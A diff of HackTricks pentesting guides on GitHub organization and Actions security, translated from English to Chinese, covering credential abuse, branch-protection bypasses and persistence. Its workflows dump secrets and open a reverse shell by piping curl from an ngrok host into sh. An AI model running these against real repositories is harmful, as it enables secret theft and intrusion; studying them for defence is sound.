**仓库可见性更改**:如果启用,具有**管理员**权限的**成员**将能够**更改其可见性**。如果禁用,只有组织所有者可以更改仓库的可见性。如果你**不**希望人们将内容**公开**,请确保此选项**禁用**。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- **仓库删除和转移**:如果启用,具有**管理员**权限的成员将能够**删除**或**转移**公共和私有**仓库**。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- **允许成员创建团队**:如果启用,任何**成员**都将能够**创建**新**团队**。如果禁用,只有组织所有者可以创建新团队。最好将此选项禁用。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- **此页面上可以配置更多内容**,但前面的内容与安全性相关性更大。 -### Actions Settings +### Actions 设置 -Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`. +可以从页面 `https://github.com/organizations//settings/actions` 配置多个与安全相关的设置。 > [!NOTE] -> Note that all this configurations can also be set on each repository independently +> 请注意,所有这些配置也可以在每个仓库中独立设置 -- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. - - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) -- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. - - _I couldn't find an API with this info, share if you do_ -- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. - - _I couldn't find an API with this info, share if you do_ -- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows. - - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) +- **Github actions 策略**:允许你指明哪些仓库可以运行工作流,哪些工作流应该被允许。建议**指定哪些仓库**应该被允许,而不是允许所有操作运行。 +- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) +- **来自外部协作者的拉取请求工作流**:建议**要求所有**外部协作者的批准。 +- _我找不到包含此信息的 API,如果你找到了,请分享_ +- **从拉取请求运行工作流**:强烈**不建议从拉取请求运行工作流**,因为分叉源的维护者将获得使用具有读取权限的令牌访问源仓库的能力。 +- _我找不到包含此信息的 API,如果你找到了,请分享_ +- **工作流权限**:强烈建议**仅授予读取仓库权限**。不建议授予写入和创建/批准拉取请求的权限,以避免滥用授予运行工作流的 GITHUB_TOKEN。 +- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) -### Integrations +### 集成 -_Let me know if you know the API endpoint to access this info!_ +_如果你知道访问此信息的 API 端点,请告诉我!_ -- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). -- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). +- **第三方应用访问策略**:建议限制对每个应用的访问,仅允许必要的应用(在审核后)。 +- **已安装的 GitHub 应用**:建议仅允许必要的应用(在审核后)。 -## Recon & Attacks abusing credentials +## 侦查与攻击滥用凭证 -For this scenario we are going to suppose that you have obtained some access to a github account. +在此场景中,我们假设你已经获得了对一个 github 账户的某些访问权限。 -### With User Credentials +### 使用用户凭证 -If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** +如果你以某种方式已经拥有组织内某个用户的凭证,你可以**直接登录**并检查你拥有的**企业和组织角色**,如果你是普通成员,检查普通成员拥有的**权限**、你所在的**组**、你对哪些**仓库**拥有的**权限**以及**这些仓库是如何保护的**。 -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +请注意,**可能会使用 2FA**,因此你只能在能够**通过该检查**的情况下访问此信息。 > [!NOTE] -> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +> 请注意,如果你**设法窃取了 `user_session` cookie**(当前配置为 SameSite: Lax),你可以**完全冒充用户**而无需凭证或 2FA。 -Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. +请查看下面关于 [**分支保护绕过**](./#branch-protection-bypass) 的部分,以防有用。 -### With User SSH Key +### 使用用户 SSH 密钥 -Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to: +Github 允许**用户**设置**SSH 密钥**,作为**代表他们部署代码的身份验证方法**(不应用 2FA)。 +使用此密钥,你可以对用户拥有某些权限的仓库进行**更改**,但是你不能使用它访问 github api 来枚举环境。然而,你可以**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +如果用户将其用户名配置为他的 github 用户名,您可以访问他帐户中设置的 **公钥**,网址为 _https://github.com/\.keys_,您可以检查此内容以确认您找到的私钥是否可以使用。 -If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH 密钥** 也可以在存储库中设置为 **部署密钥**。任何拥有此密钥的人都将能够 **从存储库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。 -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG 密钥 -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。 +在本地检查当前用户是否有任何密钥: ```shell gpg --list-secret-keys --keyid-format=long ``` +### 使用用户令牌 -### With User Token +有关[**用户令牌的介绍,请查看基本信息**](basic-github-information.md#personal-access-tokens)。 -For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). +用户令牌可以用作**HTTPS下Git的密码**,或用于[**通过基本身份验证对API进行身份验证**](https://docs.github.com/v3/auth/#basic-authentication)。根据附加的权限,您可能能够执行不同的操作。 -A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions. +用户令牌的格式如下:`ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` -A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` +### 使用Oauth应用程序 -### With Oauth Application +有关[**Github Oauth应用程序的介绍,请查看基本信息**](basic-github-information.md#oauth-applications)。 -For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). +攻击者可能创建一个**恶意Oauth应用程序**,以访问接受它们的用户的特权数据/操作,可能作为网络钓鱼活动的一部分。 -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +这些是[Oauth应用程序可以请求的范围](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)。在接受之前,应该始终检查请求的范围。 -These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them. +此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问**。 -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +### 使用Github应用程序 -### With Github Application +有关[**Github应用程序的介绍,请查看基本信息**](basic-github-information.md#github-applications)。 -For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). +攻击者可能创建一个**恶意Github应用程序**,以访问接受它们的用户的特权数据/操作,可能作为网络钓鱼活动的一部分。 -An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问**。 -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +## 破坏与滥用Github Action -## Compromise & Abuse Github Action - -There are several techniques to compromise and abuse a Github Action, check them here: +有几种技术可以破坏和滥用Github Action,请在此查看: {{#ref}} abusing-github-actions/ {{#endref}} -## Branch Protection Bypass +## 分支保护绕过 -- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. -- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** -- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. -- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. -- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). - - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. +- **要求一定数量的批准**:如果您破坏了多个帐户,您可能只需从其他帐户接受您的PR。如果您只有创建PR的帐户,则无法接受自己的PR。但是,如果您可以访问仓库中的**Github Action**环境,使用**GITHUB_TOKEN**,您可能能够**批准您的PR**并以这种方式获得1个批准。 +- _注意,对于此以及代码所有者限制,通常用户无法批准自己的PR,但如果您可以,您可以利用它来接受您的PR。_ +- **在推送新提交时撤销批准**:如果未设置此项,您可以提交合法代码,等待有人批准,然后放入恶意代码并将其合并到受保护的分支中。 +- **要求代码所有者的审查**:如果此项已激活且您是代码所有者,您可以让**Github Action创建您的PR,然后自己批准它**。 +- 当**CODEOWNER文件配置错误**时,Github不会抱怨,但也不会使用它。因此,如果配置错误,**代码所有者保护将不适用。** +- **允许指定的参与者绕过拉取请求要求**:如果您是这些参与者之一,您可以绕过拉取请求保护。 +- **包括管理员**:如果未设置此项且您是仓库的管理员,您可以绕过此分支保护。 +- **PR劫持**:您可能能够**修改其他人的PR**,添加恶意代码,自己批准结果PR并合并所有内容。 +- **移除分支保护**:如果您是**仓库的管理员,您可以禁用保护**,合并您的PR并重新设置保护。 +- **绕过推送保护**:如果一个仓库**仅允许某些用户**在分支中发送推送(合并代码)(分支保护可能保护所有分支,指定通配符`*`)。 +- 如果您对仓库**具有写入访问权限,但由于分支保护不允许推送代码**,您仍然可以**创建一个新分支**,并在其中创建一个**在代码推送时触发的github action**。由于**分支保护在分支创建之前不会保护该分支**,因此对该分支的第一次代码推送将**执行github action**。 -## Bypass Environments Protections +## 绕过环境保护 -For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). +有关[**Github环境的介绍,请查看基本信息**](basic-github-information.md#git-environments)。 -In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one). - -Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. +如果一个环境可以**从所有分支访问**,则**没有保护**,您可以轻松访问环境中的机密。请注意,您可能会发现某些仓库**所有分支都受到保护**(通过指定其名称或使用`*`),在这种情况下,**找到一个可以推送代码的分支**,您可以**通过创建新的github action(或修改一个)来提取**机密。 +请注意,您可能会发现边缘情况,其中**所有分支都受到保护**(通过通配符`*`),并且指定了**谁可以向分支推送代码**(_您可以在分支保护中指定_),而**您的用户不被允许**。您仍然可以运行自定义github action,因为您可以创建一个分支并在其上使用推送触发器。**分支保护允许推送到新分支,因此github action将被触发**。 ```yaml push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch +branches: +- current_branch_name #Use '**' to run when a push is made to any branch ``` +注意,**在创建**分支后,**分支保护将适用于新分支**,您将无法修改它,但在那时您已经提取了秘密。 -Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. +## 持久性 -## Persistence +- 生成**用户令牌** +- 从**秘密**中窃取**github令牌** +- **删除**工作流**结果**和**分支** +- 给**所有组织**更多权限 +- 创建**webhooks**以提取信息 +- 邀请**外部协作者** +- **移除****SIEM**使用的**webhooks** +- 创建/修改带有**后门**的**Github Action** +- 通过**秘密**值修改查找**易受攻击的Github Action以进行命令注入** -- Generate **user token** -- Steal **github tokens** from **secrets** - - **Deletion** of workflow **results** and **branches** -- Give **more permissions to all the org** -- Create **webhooks** to exfiltrate information -- Invite **outside collaborators** -- **Remove** **webhooks** used by the **SIEM** -- Create/modify **Github Action** with a **backdoor** -- Find **vulnerable Github Action to command injection** via **secret** value modification +### 冒名顶替提交 - 通过repo提交的后门 -### Imposter Commits - Backdoor via repo commits - -In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**. - -Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): +在Github中,可以**从一个分叉创建一个PR到一个repo**。即使PR**未被接受**,在原始repo中也会为代码的分叉版本创建一个**提交**id。因此,攻击者**可以固定使用一个来自看似合法的repo的特定提交,该提交并不是由repo的所有者创建的**。 +像[**这个**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): ```yaml name: example on: [push] jobs: - commit: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e - - shell: bash - run: | - echo 'hello world!' +commit: +runs-on: ubuntu-latest +steps: +- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +- shell: bash +run: | +echo 'hello world!' ``` - -For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) +有关更多信息,请查看 [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index c5ce0467b..9d030fe12 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -4,389 +4,371 @@ ## Basic Information -In this page you will find: +在此页面中,您将找到: -- A **summary of all the impacts** of an attacker managing to access a Github Action -- Different ways to **get access to an action**: - - Having **permissions** to create the action - - Abusing **pull request** related triggers - - Abusing **other external access** techniques - - **Pivoting** from an already compromised repo -- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) +- 攻击者成功访问 Github Action 的所有影响的 **摘要** +- 不同的 **获取访问权限** 的方式: +- 拥有 **创建 action** 的 **权限** +- 滥用与 **pull request** 相关的触发器 +- 滥用 **其他外部访问** 技术 +- 从已被攻陷的仓库进行 **横向移动** +- 最后,关于 **从内部滥用 action 的后期利用技术** 的一节(导致上述影响) ## Impacts Summary -For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions). +有关 [**Github Actions 的基本信息**](../basic-github-information.md#github-actions) 的介绍。 -If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to: +如果您可以在 **仓库** 中 **执行任意代码**,您可能能够: -- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. -- **Compromise deployments** and other **artifacts**. - - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. -- **Execute code in custom workers** to abuse computing power and pivot to other systems. -- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. +- **窃取秘密**,并 **滥用管道的权限** 以获得对外部平台(如 AWS 和 GCP)的未授权访问。 +- **破坏部署** 和其他 **工件**。 +- 如果管道部署或存储资产,您可以更改最终产品,从而启用供应链攻击。 +- **在自定义工作节点中执行代码**,以滥用计算能力并横向移动到其他系统。 +- **覆盖仓库代码**,具体取决于与 `GITHUB_TOKEN` 相关的权限。 ## GITHUB_TOKEN -This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option: +这个 "**秘密**"(来自 `${{ secrets.GITHUB_TOKEN }}` 和 `${{ github.token }}`)是在管理员启用此选项时提供的:
-This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) +此令牌与 **Github 应用程序使用的令牌相同**,因此可以访问相同的端点:[https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) > [!WARNING] -> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. +> Github 应该发布一个 [**流程**](https://github.com/github/roadmap/issues/74),**允许跨仓库** 访问 GitHub,以便一个仓库可以使用 `GITHUB_TOKEN` 访问其他内部仓库。 -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) +您可以在以下链接查看此令牌的可能 **权限**:[https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) -Note that the token **expires after the job has completed**.\ -These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` +请注意,令牌 **在作业完成后会过期**。\ +这些令牌的格式如下:`ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` -Some interesting things you can do with this token: +您可以使用此令牌执行的一些有趣操作: {{#tabs }} {{#tab name="Merge PR" }} - ```bash # Merge PR curl -X PUT \ - https://api.github.com/repos///pulls//merge \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header "content-type: application/json" \ - -d "{\"commit_title\":\"commit_title\"}" +https://api.github.com/repos///pulls//merge \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header "content-type: application/json" \ +-d "{\"commit_title\":\"commit_title\"}" ``` - {{#endtab }} -{{#tab name="Approve PR" }} - +{{#tab name="批准 PR" }} ```bash # Approve a PR curl -X POST \ - https://api.github.com/repos///pulls//reviews \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"event":"APPROVE"}' +https://api.github.com/repos///pulls//reviews \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +-d '{"event":"APPROVE"}' ``` - {{#endtab }} -{{#tab name="Create PR" }} - +{{#tab name="创建 PR" }} ```bash # Create a PR curl -X POST \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - https://api.github.com/repos///pulls \ - -d '{"head":"","base":"master", "title":"title"}' +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +https://api.github.com/repos///pulls \ +-d '{"head":"","base":"master", "title":"title"}' ``` - {{#endtab }} {{#endtabs }} > [!CAUTION] -> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. +> 请注意,在多个情况下,您将能够在 **Github Actions 环境或秘密中找到 github 用户令牌**。这些令牌可能会让您对存储库和组织拥有更多权限。
-List secrets in Github Action output - +列出 Github Action 输出中的秘密 ```yaml name: list_env on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +List_env: +runs-on: ubuntu-latest +steps: +- name: List Env +# Need to base64 encode or github will change the secret value for "***" +run: sh -c 'env | grep "secret_" | base64 -w0' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-Get reverse shell with secrets - +通过秘密获取反向 shell ```yaml name: revshell on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +create_pull_request: +runs-on: ubuntu-latest +steps: +- name: Get Rev Shell +run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions: +可以通过**检查日志**来查看其他用户仓库中Github Token的权限:
-## Allowed Execution +## 允许的执行 > [!NOTE] -> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. +> 这是妥协Github actions的最简单方法,因为这种情况假设您有**在组织中创建新仓库的权限**,或对**某个仓库具有写权限**。 > -> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). +> 如果您处于这种情况,您可以查看[后期利用技术](./#post-exploitation-techniques-from-inside-an-action)。 -### Execution from Repo Creation +### 从仓库创建执行 -In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. +如果组织的成员可以**创建新仓库**并且您可以执行github actions,您可以**创建一个新仓库并窃取在组织级别设置的秘密**。 -### Execution from a New Branch +### 从新分支执行 -If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). - -You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): +如果您可以**在已经配置了Github Action的仓库中创建新分支**,您可以**修改**它,**上传**内容,然后**从新分支执行该操作**。这样您可以**提取仓库和组织级别的秘密**(但您需要知道它们的名称)。 +您可以在**手动**时使修改后的操作可执行,当**创建PR时**或当**推送某些代码时**(取决于您想要多吵): ```yaml on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - master - push: # Run it when a push is made to a branch - branches: - - current_branch_name +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- master +push: # Run it when a push is made to a branch +branches: +- current_branch_name # Use '**' instead of a branh name to trigger the action in all the cranches ``` - --- ## Forked Execution > [!NOTE] -> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. +> 有不同的触发器可以让攻击者**执行另一个仓库的Github Action**。如果这些可触发的操作配置不当,攻击者可能会利用它们。 ### `pull_request` -The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow: +工作流触发器**`pull_request`**将在每次收到拉取请求时执行工作流,但有一些例外:默认情况下,如果这是您**第一次**进行**协作**,某些**维护者**需要**批准**工作流的**运行**:
> [!NOTE] -> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. +> 由于**默认限制**适用于**首次**贡献者,您可以通过**修复有效的错误/拼写错误**来贡献,然后发送**其他PR以滥用您新的`pull_request`权限**。 > -> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ +> **我测试过,这不管用**:~~另一个选项是创建一个与曾经为该项目贡献的人同名的账户,然后删除他的账户。~~ -Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): +此外,默认情况下**防止写权限**和**对目标仓库的秘密访问**,如[**文档**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories)中所述: -> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**. +> 除了`GITHUB_TOKEN`,**在从**`forked`**仓库触发工作流时,秘密不会传递给运行器**。在来自**forked repositories**的拉取请求中,**`GITHUB_TOKEN`具有只读权限**。 -An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations. +攻击者可以修改Github Action的定义,以执行任意操作并附加任意操作。然而,由于上述限制,他将无法窃取秘密或覆盖仓库。 > [!CAUTION] -> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** +> **是的,如果攻击者在PR中更改将被触发的github action,他的Github Action将被使用,而不是源仓库的那个!** -As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**. +由于攻击者还控制着被执行的代码,即使在`GITHUB_TOKEN`上没有秘密或写权限,攻击者也可以例如**上传恶意工件**。 ### **`pull_request_target`** -The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission). +工作流触发器**`pull_request_target`**对目标仓库具有**写权限**和**对秘密的访问**(并且不需要请求权限)。 -Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\ -Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). +请注意,工作流触发器**`pull_request_target`**在基础上下文中运行,而不是在PR提供的上下文中(以**不执行不受信任的代码**)。有关`pull_request_target`的更多信息,请[**查看文档**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target)。\ +此外,关于这种特定危险用法的更多信息,请查看这篇[**github博客文章**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)。 -It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**. +看起来因为**执行的工作流**是定义在**基础**而**不是在PR**中的,所以使用**`pull_request_target`**是**安全的**,但有**一些情况并非如此**。 -An this one will have **access to secrets**. +而且这个将具有**对秘密的访问**。 ### `workflow_run` -The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. - -In this example, a workflow is configured to run after the separate "Run Tests" workflow completes: +[**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run)触发器允许在工作流`完成`、`请求`或`进行中`时从不同的工作流运行一个工作流。 +在这个例子中,配置了一个工作流,在单独的“运行测试”工作流完成后运行: ```yaml on: - workflow_run: - workflows: [Run Tests] - types: - - completed +workflow_run: +workflows: [Run Tests] +types: +- completed ``` +此外,根据文档:由 `workflow_run` 事件启动的工作流能够 **访问秘密和写入令牌,即使之前的工作流没有**。 -Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access 